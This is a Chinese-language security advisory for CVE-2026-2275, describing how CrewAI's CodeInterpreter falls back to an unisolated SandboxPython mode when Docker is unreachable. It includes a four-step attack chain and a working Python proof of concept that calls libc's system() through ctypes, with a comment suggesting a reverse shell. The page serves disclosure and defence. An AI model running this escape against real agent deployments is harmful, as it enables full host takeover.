CVE-2026-2275 CrewAI CodeInterpreter 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-2275

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

CrewAI CodeInterpreter

漏洞概述

CrewAI的CodeInterpreter工具被曝存在严重安全漏洞。当该工具无法连接到Docker服务时，会自动回退至SandboxPython模式。由于该回退机制缺乏严格的安全隔离，攻击者可利用此漏洞进行任意C函数调用，进而在目标系统上执行任意代码。该漏洞CVSS评分高达9.6，无需用户认证即可利用，对系统机密性、完整性和可用性构成极高威胁。

技术细节

该漏洞的核心在于CrewAI CodeInterpreter工具的错误降级机制。当工具检测到Docker守护进程不可达时，会自动将执行环境从隔离的Docker容器切换至SandboxPython。然而，SandboxPython并未提供与Docker同等强度的安全隔离，且未限制Python的底层功能调用能力。攻击者可以利用这一缺陷，构造特定的Python脚本，利用`ctypes`库直接加载系统的C标准库（libc.so），并调用`system()`等危险函数。由于此时代码运行在宿主机环境且未受有效沙箱约束，攻击者可借此执行任意系统命令，导致敏感信息泄露、数据篡改或服务器被完全控制，形成严重的远程代码执行风险。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别出目标系统正在使用CrewAI框架，并确认CodeInterpreter工具已启用。

STEP 2

步骤2：环境触发

攻击者通过某种方式（如网络干扰或资源耗尽）导致目标系统的Docker服务不可用，迫使CodeInterpreter触发回退机制，进入不安全的SandboxPython模式。

STEP 3

步骤3：载荷注入

攻击者向CodeInterpreter提交包含恶意Python代码的任务，代码中使用ctypes库定义对C库函数（如system）的调用。

STEP 4

步骤4：执行与控制

SandboxPython解析并执行该代码，直接在宿主机操作系统层面调用C函数执行任意Shell命令，攻击者 thus 获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import ctypes
import sys

# Proof of Concept for CVE-2026-2275
# This simulates the arbitrary C function call when Docker is unreachable and SandboxPython is active.

def execute_shell_command(command):
    try:
        # Load the C standard library (libc on Linux, msvcrt on Windows)
        if sys.platform.startswith('linux'):
            libc = ctypes.CDLL('libc.so.6')
        elif sys.platform == 'darwin':
            libc = ctypes.CDLL('libSystem.dylib')
        elif sys.platform == 'win32':
            libc = ctypes.cdll.msvcrt
        else:
            return "Unsupported platform"

        # Define the argument and return type for the system function
        libc.system.argtypes = [ctypes.c_char_p]
        libc.system.restype = ctypes.c_int

        # Execute the command
        result = libc.system(command.encode('utf-8'))
        return f"Command executed with return code: {result}"
    except Exception as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    # Example command: create a file or run a reverse shell
    cmd = "touch /tmp/crewai_poc.txt"
    print(f"Attempting to execute: {cmd}")
    print(execute_shell_command(cmd))

影响范围

CrewAI CodeInterpreter (所有在Docker不可用时回退至SandboxPython的版本)

防御指南

临时缓解措施

在未修复漏洞前，应严格确保Docker环境的高可用性，防止系统自动回退到SandboxPython模式。同时，建议对CrewAI的执行环境进行严格的网络隔离和权限控制，监控非预期的系统调用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2275
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2275
3 Details https://www.cvedetails.com/cve/CVE-2026-2275/
4 VulDB https://vuldb.com/cve/CVE-2026-2275
5 Link https://docs.crewai.com/en/tools/ai-ml/codeinterpretertool
6 Link https://www.kb.cert.org/vuls/id/221883